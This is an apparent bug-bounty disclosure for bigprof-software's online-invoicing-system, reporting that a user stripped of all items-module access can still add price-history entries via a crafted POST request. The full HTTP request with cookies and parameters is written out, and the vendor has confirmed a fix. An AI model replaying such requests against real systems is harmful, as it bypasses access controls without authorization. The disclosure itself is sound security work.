Improper Privilege Management in bigprof-software/online-invoicing-system

Valid

Reported on

Jul 2nd 2021


💥 BUG

privilege escalation bug to add item to a price-history

💥 IMPACT

unprivileged user can add item to a price-history

💥 STEP TO REPRODUCE

1. From admin account goto http://localhost/online-invoice2/app/admin/pageViewMembers.php and add new user called user-B .
Now revoke all acccess from items module for user-B .
So, user-B cant view/edit/create/delete any item.
2. Now goto admin account and add a new item .Lets asume the item id is 4\

3. Now goto user-B account and sent bellow request to add price-history to above items.

POST /online-invoice2/app/item_prices_view.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 278
Origin: http://localhost
Connection: close
Referer: http://localhost/online-invoice2/app/item_prices_view.php?filterer_item=3&addNew_x=1&Embedded=1&AutoClose=1
Cookie: online_inovicing_system=hjcfmd0ifcgfh9ou7bks4evlaf; online_inovicing_system_remember_me=user%3B%3BQtbPdoWs9MEdoGT5dobFnpoH9Kjrjg%3B%3BmO5JogX1nUnGLO2lOkQhIh0Mb01XTv; 
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

Embedded=1&AutoClose=1&csrf_token=98b28bcb96e14bd04c42d361724ea2ae&filterer_item=3&current_view=DV&SortField=&SelectedID=&SelectedField=&SortDirection=&FirstRecord=1&NoDV=&PrintDV=&DisplayRecords=all&item=3&price=0.00&dateDay=2&dateMonth=7&dateYear=2021&insert_x=1&SearchString=

Here in this request change item parameter value to above captured item id and a new price-hostory will be added to above items .
So, user-B dont have any access in items module but can add price-history to any item .

We have contacted a member of the bigprof-software/online-invoicing-system team and are waiting to hear back a year ago
BigProf Software validated this vulnerability a year ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
BigProf Software confirmed that a fix has been merged on 217a7b a year ago
BigProf Software has been awarded the fix bounty
to join this conversation